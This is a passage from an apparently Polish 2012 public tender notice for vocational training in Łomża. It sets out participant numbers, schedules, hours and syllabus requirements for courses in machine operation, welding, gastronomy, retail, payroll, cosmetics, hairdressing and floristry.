Program szkolenia musi być sporządzony zgodnie z Modułowymi Programami Szkolenia Zawodowego Ministerstwa Pracy i Polityki Społecznej oraz Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 roku w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz.U. z 2001r. Nr 118 poz. 1263).
Wykonawca skieruje każdego z uczestników projektu na obowiązkowe badania lekarskie uprawniające do uczestnictwa w kursie.
Planowana liczba godzin dla każdego uczestnika wynosi ogółem 202 godzin zegarowych, w tym 86 godzin zajęć praktycznych.
Zakres kursu powinien zawierać co najmniej takie moduły jak: Użytkowanie eksploatacyjne, Dokumentacja techniczna, BHP, Podstawy elektrotechniki, Silniki spalinowe, Elementy hydrauliki, Budowa koparko - ładowarki, Technologia robót, Zajęcia praktyczne
Szkolenie praktyczne powinno odbywać się pod nadzorem instruktora szkolenia. Każde szkolenie powinno być poprzedzone pokazem (instruktażem) przeprowadzonym przez instruktora szkolenia. W programie szkolenia należy przewidzieć czas dla powtórzenia ćwiczeń, które przysporzyły uczestnikom najwięcej trudności.
Oprócz zaświadczeń uczestnik kursu, po zdaniu odpowiedniego egzaminu, ma otrzymać następujące certyfikaty: 
a.	Świadectwo potwierdzające pozytywny wynik egzaminu wydane przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego
b.	Książka operatora maszyn roboczych

Operator ładowarki jednonaczyniowej do 2,5 m3 , klasa III.  
LICZBA UCZESTNIKÓW: 1
TERMIN  REALIZACJI USŁUGI : lipiec- do  31 październik  2012
MIEJSCE REALIZACJI USŁUGI: preferowane miasto Łomża,
W przypadku szkolenia poza Łomżą w miejscowości oddalonej najdalej 15 km od Łomży,  Wykonawca ma obowiązek zapewnić dojazd z miasta do miejsca szkolenia oraz z miejsca szkolenia do miasta Łomża, 
W przypadku szkolenia poza Łomżą w miejscowości oddalonej dalej niż 30 km od Łomży,  Wykonawca ma obowiązek zapewnić zakwaterowanie i wyżywienie 
CEL SZKOLENIA: do uzyskania kwalifikacji w zawodzie operatora maszyn i urządzeń roboczych budowlanych i drogowych w zakresie III klasy uprawnień.
ORGANIZACJA SZKOLENIA: istotnym warunkiem zamówienia jest przeprowadzenie zajęć w systemie weekendowym (tj. w soboty i niedziele)., w godz. od 8:00 do 16:00. Z uwagi na fakt, iż kierowane na kurs są 2 osoby, Zamawiający dopuszcza dołączenie kursantów do innej grupy, po wcześniejszym uzgodnieniu z Zamawiającym

WYMAGANIA DODATKOWE:

Program szkolenia musi być sporządzony zgodnie z Modułowymi Programami Szkolenia Zawodowego Ministerstwa Pracy i Polityki Społecznej oraz Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 roku w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz.U. z 2001r. Nr 118 poz. 1263).
Program szkolenia powinien być zatwierdzony przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego z Warszawy oraz zawierać co najmniej takie moduły jak: Użytkowanie eksploatacyjne, Dokumentacja techniczna, Bezpieczeństwo i higiena pracy, Podstawy elektrotechniki, Silniki spalinowe, Elementy hydrauliki, Budowa koparki jednonaczyniowej, Technologia robót, Zajęcia praktyczne
Wykonawca skieruje każdego z uczestników projektu na obowiązkowe badania lekarskie uprawniające do uczestnictwa w kursie.
Planowana liczba godzin dla każdego uczestnika wynosi ogółem 202 godzin zegarowych, w tym 86 godzin zajęć praktycznych.
Szkolenie praktyczne powinno odbywać się pod nadzorem instruktora szkolenia. Każde szkolenie powinno być poprzedzone pokazem (instruktażem) przeprowadzonym przez instruktora szkolenia. W programie szkolenia należy przewidzieć czas dla powtórzenia ćwiczeń, które przysporzyły uczestnikom najwięcej trudności.
Oprócz zaświadczeń uczestnik kursu, po zdaniu odpowiedniego egzaminu, ma otrzymać następujące certyfikaty: 
a.	Świadectwo potwierdzające pozytywny wynik egzaminu wydane przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego
książka operatora maszyn roboczych


Operator jednonaczyniowej koparki 0,8m3 kl.III
LICZBA UCZESTNIKÓW: 2
TERMIN  REALIZACJI USŁUGI : lipiec- do  31 październik  2012
MIEJSCE REALIZACJI USŁUGI:  preferowane miasto Łomża,
W przypadku szkolenia poza Łomżą w miejscowości oddalonej najdalej 15 km od Łomży,  Wykonawca ma obowiązek zapewnić dojazd z miasta Łomża do miejsca szkolenia oraz z miejsca szkolenia do miasta Łomża, 
W przypadku szkolenia poza Łomżą w miejscowości oddalonej dalej niż 30 km od Łomży,  Wykonawca ma obowiązek zapewnić zakwaterowanie i wyżywienie 
CEL SZKOLENIA: przygotowanie uczestników do pracy na stanowisku operatora koparki
jednonaczyniowej do 0,8 m3 klasa III. 
ORGANIZACJA SZKOLENIA: istotnym warunkiem zamówienia jest przeprowadzenie zajęć w systemie weekendowym (tj. w soboty i niedziele). Z uwagi na fakt, iż kierowane na kurs jest 1 osoba, Zamawiający dopuszcza dołączenie kursanta do innej grupy, po wcześniejszym uzgodnieniu z Zamawiającym

WYMAGANIA DODATKOWE:

Program szkolenia musi być sporządzony zgodnie z Modułowymi Programami Szkolenia Zawodowego Ministerstwa Pracy i Polityki Społecznej oraz Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 roku w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz.U. z 2001r. Nr 118 poz. 1263).
Program szkolenia powinien być zatwierdzony przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego z Warszawy oraz zawierać co najmniej takie moduły jak : użytkowanie eksploatacyjne, dokumentacja techniczna, bezpieczeństwo i higiena pracy, podstawy elektrotechniki, silniki spalinowe, elementy hydrauliki, budowa koparek, technologia robót, zajęcia praktyczne
Wykonawca skieruje każdego z uczestników projektu na obowiązkowe badania lekarskie uprawniające do uczestnictwa w kursie
Planowana liczba godzin dla każdego uczestnika wynosi ogółem 202 godzin zegarowych, w tym 86 godzin zajęć praktycznych.
Szkolenie praktyczne powinno odbywać się pod nadzorem instruktora szkolenia. Każde szkolenie powinno być poprzedzone pokazem (instruktażem) przeprowadzonym przez instruktora szkolenia. W programie szkolenia należy przewidzieć czas dla powtórzenia ćwiczeń, które przysporzyły uczestnikom najwięcej trudności.
Oprócz zaświadczeń  uczestnik kursu, po zdaniu odpowiedniego egzaminu, ma otrzymać następujące certyfikaty: 
a.	Świadectwo potwierdzające pozytywny wynik egzaminu wydane przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego
b.	książka operatora maszyn roboczych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie kursu spawania metodą MAG , TIG, elektrodami otulonymi MMA , blach spoinami czołowymi (metoda MAG i TIG).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs spawania metodą MAG (135)
LICZBA  UCZESTNIKÓW: 10
TERMIN  REALIZACJI USŁUGI : od 3 września do  30 listopada  2012
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża
CEL SZKOLENIA: uzyskanie uprawnień spawalniczych w zakresie spawania blach i rur spoinami pachwinowymi metodą MAG-135 
ORGANIZACJA SZKOLENIA: istotnym warunkiem zamówienia jest przeprowadzenie zajęć w dni robocze, w systemie popołudniowym 

Kurs spawania metodą TIG (141)
LICZBA UCZESTNIKÓW: 10
TERMIN  REALIZACJI USŁUGI : od 3 września  do  30 listopada 2012
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża
CEL SZKOLENIA: uzyskanie uprawnień spawalniczych w zakresie spawania blach i rur spoinami pachwinowymi metodą TIG-141.
ORGANIZACJA SZKOLENIA: istotnym warunkiem zamówienia jest przeprowadzenie zajęć w dni robocze, w systemie popołudniowym 

Kurs spawania elektrodami otulonymi MMA (111)
LICZBA UCZESTNIKÓW: 1
TERMIN  REALIZACJI USŁUGI : od 3 września do  30 listopada 2012
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża
CEL SZKOLENIA:  uzyskanie uprawnień spawalniczych w zakresie spawania elektrodami otulonymi MMA (111)
ORGANIZACJA SZKOLENIA: istotnym warunkiem zamówienia jest przeprowadzenie zajęć w dni robocze, w systemie popołudniowym 

Kurs spawania blach spoinami czołowymi (metoda MAG i TIG)
LICZBA UCZESTNIKÓW: 1
TERMIN  REALIZACJI USŁUGI : od  3 września  do  30 listopada 2012
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża
CEL SZKOLENIA:  uzyskanie uprawnień spawalniczych w zakresie  spawania blach spoinami czołowymi metodą MAG-135 i TIG-141.
ORGANIZACJA SZKOLENIA: istotnym warunkiem zamówienia jest przeprowadzenie zajęć w dni robocze, w systemie popołudniowym 


WYMAGANIA DODATKOWE:

Program szkolenia z zakresu spawania musi być zgodny z wytycznymi Instytutu Spawalnictwa 
Wykonawca skieruje każdego z uczestników projektu na obowiązkowe badania lekarskie uprawniające do uczestnictwa w kursie
Baza szkoleniowa do przeprowadzenia zajęć znajdująca się na terenie Miasta Łomża w szczególności musi być zgodna
z wymaganiami instytucji uprawnionych do wydawania atestów/certyfikatów  na prowadzenie szkoleń i egzaminów spawaczy, uzyskanych na podstawie wymagań instytucji podległych Ministrowi Gospodarki lub innemu właściwemu,
z Rozporządzeniem Ministra Gospodarki z 27.04.2000 w sprawie bezpieczeństwa i higieny pracy przy pracach spawalniczych (Dz.U. z 2000 r., Nr 40, poz.470).

Kurs będzie kończyć się egzaminem zewnętrznym przeprowadzanym przez komisję powołaną przez Instytut Spawalnictwa w Gliwicach. zgodnie z Wytycznymi Instytutu Spawalnictwa w Gliwicach;
Oprócz certyfikatów kursanci otrzymają Książeczki Spawacza ze stosownym wpisem zgodnym z polską Normą wg wskazań Instytutu Spawalnictwa w Gliwicach oraz Euro świadectwem w języku polskim i angielskim ze stosownym wpisem do książeczki Spawacza przedstawiciela PRS..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zorganizowanie Kursu gastronomicznego z obsługą kasy fiskalnej i kursu Kelner - barman.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs gastronomiczny z obsługą kasy fiskalnej 

LICZBA UCZESTNIKÓW: 13
TERMIN  REALIZACJI USŁUGI : lipiec-  31 październik  2012
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża 
CEL SZKOLENIA: jest nabycie przez uczestników wiedzy i umiejętności służących do znalezienia pracy w gastronomii lub uruchomienia własnej działalności gospodarczej.
ORGANIZACJA SZKOLENIA: istotnym warunkiem zamówienia jest przeprowadzenie zajęć w systemie weekendowym (tj. w soboty i niedziele) w godz. od 8:00 d0 16:00.

WYMAGANIA DODATKOWE: 
czas trwania  szkolenia 140 godzin dydaktycznych przypadających na każdego uczestnika szkolenia, w tym nie mniej niż 120 godzin zajęć praktycznych 
program szkolenia powinien uwzględniać zagadnienia z zakresu:
a)	organizacja punktu gastronomicznego,
b)	zagadnienia higieny w procesie produkcji żywności i obrocie żywnością
c)	obsługa klienta- zagadnienia podstawowe,
d)	dobierania, obsługiwania maszyn, urządzeń i sprzętu w małej gastronomii
e)	dobieranie surowców i półproduktów do produkcji w małej gastronomii
f)	przeprowadzenie obróbki wstępnej,
g)	przygotowanie półproduktów do dalszej obróbki w małej gastronomii,
h)	dokonywanie obróbki termicznej surowców i półproduktów w małej gastronomii,
i)	sporządzanie różnymi technikami i metodami podstawowego asortymentu potraw i napojów,
j)	planowanie posiłków i układnie menu,
k)	porcjowanie i ekspedycja potraw w małej gastronomii,
l)	dekorowanie potraw oraz stołu
m)	przechowywanie i magazynowanie surowców, półproduktów i wyrobów gotowych w małej gastronomii,
n)	praca przy kasie fiskalnej - rejestracji sprzedaży i programowania kas fiskalnych
kurs ma się odbywać w lokalu dostosowanym do prawidłowego przeprowadzenia zajęć praktycznych dla 13 osób, gdzie dostępny jest sprzęt kuchenny niezbędny do zrealizowania programu kursu, każdemu uczestnikowi należy zapewnić samodzielne stanowisko pracy.

Kelner - barman
LICZBA UCZESTNIKÓW: 2
TERMIN  REALIZACJI USŁUGI : lipiec-sierpień 2012
MIEJSCE REALIZACJI USŁUGI:  preferowane miasto Łomża, w przypadku szkoleń odbywających się poza Łomżą do ceny kursu należy doliczyć koszty zakwaterowania i wyżywienia 
CEL SZKOLENIA: celem szkolenia jest nabycie wiedzy teoretycznej i praktycznych umiejętności oraz przygotowanie do pracy na stanowisku barman - barista i kelner
ORGANIZACJA SZKOLENIA: kurs należy przeprowadzić w okresie wakacyjnym (tj. lipiec-sierpień), w dni robocze (poniedziałek-piątek). Z uwagi na fakt, iż na kurs kierowane są 2 osoby, Zamawiający dopuszcza dołączenie kursantów do innej grupy, po wcześniejszym uzgodnieniu z Zamawiającym.

WYMAGANIA DODATKOWE: 

W czas trwania  szkolenia 120  godzin dydaktycznych przypadających na każdego uczestnika szkolenia, w tym nie mniej niż 100 godzin zajęć praktycznych 
Szkolenie powinno zawierać co najmniej zagadnienia:
z zakresu zawodu barmana:
wprowadzenie do zawodu barmana - wizerunek, obowiązki, etyka, organizacja pracy, bhp,
sprzęt barowy - rodzaje, nazwy, funkcjonowanie,
alkoholoznawstwo - kategorie/podział alkoholi, produkcja, zastosowanie,
zasady i technika komponowania napojów mieszanych - charakterystyka, podział, składniki,
zasady podawania napojów alkoholowych - serwowanie alkoholi, obsługa przy barze i stoliku,
wprowadzenie do zawodu barista
obowiązki, narzędzia, organizacja pracy, bhp,
podstawowe informacje o kawie - historia, gatunki, uprawa, pozyskiwanie, obróbka ziaren, magazynowanie, sposoby palenia,
espresso - sprzęt, etapy przygotowania, prawidłowe metody dozowania i ubijania,
napoje na bazie espresso,
zdobienie - wzory lane, rysowane.
z zakresu zawodu kelnera:
przestrzeganie zasad bhp, ppoS. w sali konsumenckiej
wykazywanie kultury osobistej i przestrzeganie etyki zawodowej
wyposażenie i obsługa sprzętu kelnerskiego w części konsumenckiej i ekspedycyjnej
przygotowanie poprzedzające obsługę
przygotowanie sali konsumenckiej
obsługiwanie w sali konsumenckiej
noszenie zastawy
serwowanie potraw
wydawanie śniadań
przygotowanie potraw w obecności konsumenta
serwowanie napojów bezalkoholowych zimnych i gorących
serwowanie napojów alkoholowych
organizacja przyjęć okolicznościowych
obsługa gości hotelowych przez kelnera
wystawianie rachunków

Wykonawca zapewni  niezbędny sprzęt i lokal do zrealizowania programu kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zorganizowanie kursu składającego się z 2 modułów: Kurs obsługa kasy fiskalnej i terminali kart płatniczych oraz kurs sprzedawca i fakturowanie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs Obsługa kasy fiskalnej i terminali kart płatniczych

LICZBA UCZESTNIKÓW: 25    przynajmniej  2 grupy szkoleniowe
TERMIN  REALIZACJI USŁUGI : od 23.07.2012 do 03.08.2012
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża 
CEL SZKOLENIA: nabycie praktycznych umiejętności posługiwania się kasą fiskalną i terminalami kart płatniczych
ORGANIZACJA SZKOLENIA: zajęcia skumulowane, przeprowadzone w ciągu 3 dni roboczych w godz. od 9:00 do 17:00, w terminie od 23.07.2012 do 03.08.2012


Kurs Sprzedawca z fakturowaniem

LICZBA UCZESTNIKÓW: 15
TERMIN  REALIZACJI USŁUGI : od dnia podpisania umowy do  31 sierpień 2012
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża 
CEL SZKOLENIA: przygotowanie uczestników szkolenia do pracy w zawodzie sprzedawcy
ORGANIZACJA SZKOLENIA: istotnym warunkiem zamówienia jest przeprowadzenie zajęć w dni robocze,  2 razy w tygodniu (poniedziałek, czwartek ) w godz. od 9:00 do 17:00, od 23 lipca do  sierpnia

WYMAGANIA DODATKOWE: 

Wymagana ilość godzin zajęć dydaktycznych dla każdego uczestnika szkolenia:
Kurs kasy fiskalnej: 20 godzin dydaktycznych 
Kurs sprzedawca+ fakturowanie: 65 godzin dydaktycznych 

Sposób organizacji kursu:
Kurs kasy fiskalnej: zajęcia skumulowane, przeprowadzone w ciągu 3 dni roboczych- wymaga się aby zajęcia odbyły się  od 23.07.2012 do 03.08.2012); 
UWAGA! Z uwagi na wymóg zapewnienia 1 kasy na 1 uczestnika szkolenia oraz ilość uczestników szkolenia Wykonawca zorganizuje zajęcia  przynajmniej w 2 grupach.

 (sprzedawca i fakturowanie)   2 razy w tygodniu (poniedziałek, czwartek ) w godz. od 9:00 do 17:00, od 23 lipca do  31 sierpnia 2012,  (8 godzin zegarowych dziennie, do których wlicza się zarówno czas realizacji zajęć jak i przerwy między zajęciami)  i będą zorganizowane w następujący sposób: w każdy dzień kursu odbędzie się 9 godzin dydaktycznych zajęć ( po 45 minut) oraz przerwy ( co najmniej 1 przerwa 30-minutowa oraz 3 przerwy 15-minutowe)

UWAGA!W związku z faktem, ze wszyscy kursanci biorący udział w kursie sprzedawca+ fakturowanie biorą też udział w kursie kasy fiskalnej realizacja tych dwóch kursów nie może odbywać się w jednym czasie.  

Program powinien zawierać:

Kurs obsługa kasy fiskalnej i terminali kart płatniczych:
budowy kas fiskalnych
pracy przy kasie fiskalnej - rejestracji sprzedaży i programowania kas fiskalnych
obsługi urządzeń dodatkowych wspomagających pracę kasjera, w tym terminali kart płatniczych
obsługi kas fiskalnych w połączeniu z komputerowym systemem obsługi sprzedaży

kurs sprzedawca i  fakturowanie

minimum sanitarnego
technik sprzedaży
obsługi klienta z wykorzystaniem aktywnych metod sprzedaży
pozyskiwania i obsługi nabywców
przyjmowania dostaw towarów oraz ich przygotowanie do sprzedaży
dokumentowania obrotu towaru, operacji rachunkowo - kasowych
marketingu i reklamy
fakturowanie i dokumentowanie sprzedaży
obsługa programów komputerowych służących do fakturowania

W trakcie zajęć praktycznych - dotyczy wykorzystania programów do fakturowania i obsługi kasy fiskalnej - wykonawca zapewnia 1 stanowisko komputerowe i jedno stanowisko kasy fiskalnej dla każdego uczestnika szkolenia

Z racji faktu, ze jeden z uczestników kursu obsługi kasy fiskalnej porusza się na wózku inwalidzkim wymaga się, aby lokal nie posiadał barier architektonicznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zorganizowanie kursu: Kadry i płace z elementami księgowości.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs Kadry i płace z elementami księgowości

LICZBA UCZESTNIKÓW: 11
TERMIN  REALIZACJI USŁUGI : lipiec- 15 październik 2012
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża 
CEL SZKOLENIA:  praktyczne przygotowanie do pracy w charakterze pracownika ds. kadr i płac.
ORGANIZACJA SZKOLENIA: istotnym warunkiem zamówienia jest przeprowadzenie zajęć w systemie weekendowym (tj. soboty i niedziele w godz. od 8:00 do 16:00)


WYMAGANIA DODATKOWE: 
Wymagana ilość godzin zajęć dydaktycznych przypadających na każdego uczestnika  - 180, w tym 144 godziny przeznaczone na moduł kadry i płace, a 36 godzin na podstawy księgowości. Sposób organizacji zajęć: zajęcia muszą odbywać się w soboty i niedziele od 8:00 do 16:00 (8 godzin zegarowych dziennie, do których wlicza się zarówno czas realizacji zajęć jak i przerwy między zajęciami)  i będą zorganizowane w następujący sposób: w każdy dzień kursu odbędzie się 9 godzin dydaktycznych zajęć ( po 45 minut) oraz przerwy ( co najmniej 1 przerwa 30-minutowa oraz 3 przerwy 15-minutowe)
Program powinien zawierać:
Prawo pracy (rodzaje umów o pracę, dokumentacja związana z zatrudnieniem, rozwiązywanie umów o pracę, świadectwo pracy, czas pracy)- 20 godz.
Płace  - 56 godz.
Przychody ze stosunku pracy na podst. ustawy o podatku dochodowym (nieodpłatne  świadczenie, zaliczki, koszty uzyskania przychodu, PIT 2,  PIT 4R, PIT 11, składki ZUS)
Wynagrodzenia (pojęcia, składniki wynagrodzenia, wynagrodzenia za czas nieobecności w pracy, wynagrodzenia za czas choroby, ekwiwalent za urlop, naliczanie wynagrodzeń, ewidencja wynagrodzenia, wynagrodzenie z umów cywilno-prawnych, system wynagrodzeń za pracę (miesięczne, godzinowe, prowizyjne,  akordowe, zadaniowe, w systemie mieszanym)
Ubezpieczenia 30h
Wypełnianie formularzy ubezpieczeniowych, ubezpieczenia społeczne i zdrowotne
Obsługa programu Płatnik - 18 godz.
Kadry i płace w ujęciu informatycznym - program Symfonia - 20  godz.,
Podstawy księgowości: prowadzenie ksiąg przychodów-rozchodów, rachunkowych, posługiwanie się księgowymi dokumentami, realizacja typowych operacji księgowych, dekretacje na kontach ksiąg, zestawień obrotów i sald- 36 godzin
Szkolenie kończy się egzaminem wewnętrznym sprawdzającym nabyte przez uczestników umiejętności.
Zajęcia muszą odbywać się w salach szkoleniowych w siedzibie instytucji szkoleniowej lub w salach konferencyjnych, gdzie zapewnione są właściwe warunki BHP i p.poż. oraz zaplecze socjalne, w tym dostęp do WC zaopatrzony w środki higieny. Sale powinny być przestronne, odpowiednio oświetlone, wentylowane i wyposażone co najmniej w tablicę standardową lub flipchart.
Każdy z uczestników musi mieć zapewnione osobne miejsce oraz samodzielne stanowisko komputerowe. Do części zamówienia, w programie których przewidziane są zajęcia komputerowe Wykonawca musi zapewnić urządzenia peryferyjne tj. co najmniej 2 drukarki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zorganizowanie Kursu kosmetycznego z elementami wizażu i stylizacji paznokci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs kosmetyczny z elementami wizażu i stylizacji paznokci

LICZBA UCZESTNIKÓW: 12 
 Ilość grup szkoleniowych: 2 (6 osobowe)- w przypadku, gdy Wykonawca jest w stanie zapewnić 12 samodzielnych stanowisk pracy w salonie zajęcia mogą być zorganizowane dla wszystkich kursantów jednocześnie
TERMIN  REALIZACJI USŁUGI : 23 lipiec-14 sierpień dla wszystkich kursantów lub 23 lipiec-14 sierpień (I grupa) oraz 20 sierpień- 14 wrzesień 2012 (II grupa)
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża 
CEL SZKOLENIA:  zdobycie wiedzy i umiejętności z zakresu kosmetyki, wizażu i stylizacji paznokci.
ORGANIZACJA SZKOLENIA: szkolenie powinno odbywać się w dni robocze, w godz. od 9:00 do 16:00 ( 7 godzin zegarowych dziennie), 

 WYMAGANIA DODATKOWE: 

Wymagana ilość godzin zajęć dydaktycznych - 120 godzin, w tym przynajmniej 100 godzin zajęć praktycznych przypadających na 1 uczestnika kursu
Kurs dla będzie odbywał się w godz. od 9:00 do 16:00 (7 godzin zegarowych dziennie, do których wlicza się zarówno czas realizacji zajęć jak i przerwy między zajęciami)  i będą zorganizowane w następujący sposób: w każdy dzień kursu odbędzie się 8 godzin dydaktycznych zajęć ( po 45 minut) oraz przerwy ( np. 2 przerwy 30-minutowe)
W ramach przewidzianej kwoty powinny być przeprowadzone badania lekarskie (w tym w razie konieczności przeprowadzenie badań sanitarno-epidemiologicznych) kończące się wydaniem orzeczenia o braku przeciwwskazań do uczestnictwa w kursach wykonane przed rozpoczęciem zajęć.
Szkolenie powinno obejmować zagadnienia z zakresu:
zorganizowanie stanowiska pracy, przygotowanie kosmetyków, narzędzi pracy
umiejętność przeprowadzenia wywiadu z klientem,
techniki wizażu i profesjonalnego makijażu
wykonywanie różnych rodzajów makijażu
techniki stylizacji - określenie typu urody i sylwetki, ubioru, korekcja stylu, zastosowanie dodatków, biżuterii
diagnostyka cery
pielęgnacja twarzy - zabiegi do wszystkich rodzajów cery (nawilżające, regenerujące, kolagenowe, dotleniające, stymulujące, liftingujące, z zastosowaniem aparatu do kawitacji, mikrodermabrazji), kwasy owocowe 
oczyszczanie manualne, wykonywanie masażu twarzy
Henna rzęs i brwi, regulacja brwi
Pielęgnacja dłoni- preparaty używane do pielęgnacji dłoni i paznokci, zdobnictwo paznokci w tym: akrylem, żelem oraz przedłużanie paznokci, manicure francuski, manicure hybrydowy
 pielęgnacja stóp - pedicure kosmetyczny, specjalistyczny, detoksykacja stóp,
Pielęgnacja ciała - zabiegi antycellulitowe, zabiegi detoksykujące, peelingi
Depilacja skóry przy użyciu wosku depilacja - wszystkie rodzaje wosków; obsługa aparatów i urządzeń stosowanych w kosmetyce z uwzględnieniem obowiązujących przepisów sanitarnych i BHP;
zapewnienie materiałów i narzędzi kosmetycznych potrzebnych do przeprowadzenia zajęć praktycznych
zapewnienie odpowiedniego miejsca prowadzenia zajęć teoretycznych i praktycznych wyposażonego w sprzęt i pomoce dydaktyczne umożliwiające prawidłową realizacji kształcenia, zapewniające bezpieczne i higieniczne warunki pracy i nauki. Zajęcia praktyczne muszą odbywać się w salonie kosmetycznym ( zajęcia praktyczne muszą być zorganizowane w taki sposób, by każdy uczestnik miał samodzielne stanowisko pracy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zorganizowanie Kursu fryzjerskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs fryzjerski

LICZBA UCZESTNIKÓW: 9
TERMIN  REALIZACJI USŁUGI : 23 lipiec- 31 sierpień 2012
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża 
CEL SZKOLENIA:  przygotowanie do pracy w charakterze fryzjerki
ORGANIZACJA SZKOLENIA: kurs musi odbywać się w wakacje, w dni robocze od poniedziałku do czwartku, od 9:00 do 17:00, 4 razy w tygodniu

WYMAGANIA DODATKOWE: 

Wymagana ilość godzin zajęć dydaktycznych - 120 godzin, w tym przynajmniej 100 godzin zajęć praktycznych przypadających na 1 uczestnika kursu
zajęcia muszą odbywać się w dni robocze (od poniedziałku do czwartku), od 9:00 do 17:00 (8 godzin zegarowych dziennie, do których wlicza się zarówno czas realizacji zajęć jak i przerwy między zajęciami)  i będą zorganizowane w następujący sposób: w każdy dzień kursu odbędzie się 9 godzin dydaktycznych zajęć ( po 45 minut) oraz przerwy ( co najmniej 1 przerwa 30-minutowa oraz 3 przerwy 15-minutowe)
Szkolenie powinno obejmować zagadnienia z zakresu:
- organizacja stanowiska pracy oraz zasady BHP w zawodzie fryzjera
- mycie i masaż głowy
- strzyżenie damskie, męskie
- ondulacja trwała i wodna
- nowoczesne techniki koloryzacji (farbowanie całego porostu włosów, farbowanie odrostów
porostu włosów, balejaż -pasemka, kontrasty i refleksy we włosach)
- czesanie i stylizacja fryzur
- pielęgnacja włosów (dobór i charakterystyka odpowiednich środków)
- analiza kolorystyczna (dobór fryzury i koloru do typu urody)
zapewnienie odpowiedniego miejsca prowadzenia zajęć teoretycznych i praktycznych wyposażonego w sprzęt i pomoce dydaktyczne umożliwiające prawidłową realizacji kształcenia, zapewniające bezpieczne i higieniczne warunki pracy i nauki. 
Wykonawca powinien zapewnić sprzęt oraz pakiet materiałów i narzędzi (w odpowiednim asortymencie i ilości) umożliwiający swobodne i efektywne przeprowadzenie wszystkich elementów zajęć praktycznych.

Zajęcia praktyczne muszą odbywać się w salonie fryzjerskim ( zajęcia praktyczne muszą być zorganizowane w taki sposób, by każdy uczestnik miał samodzielne stanowisko pracy, w razie konieczności należy podzielić uczestników na 2 grupy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zorganizowanie kursu Florystyka - bukieciarstwo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Florystyka - bukieciarstwo

LICZBA UCZESTNIKÓW: 7
TERMIN  REALIZACJI USŁUGI : październik  2012
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża 
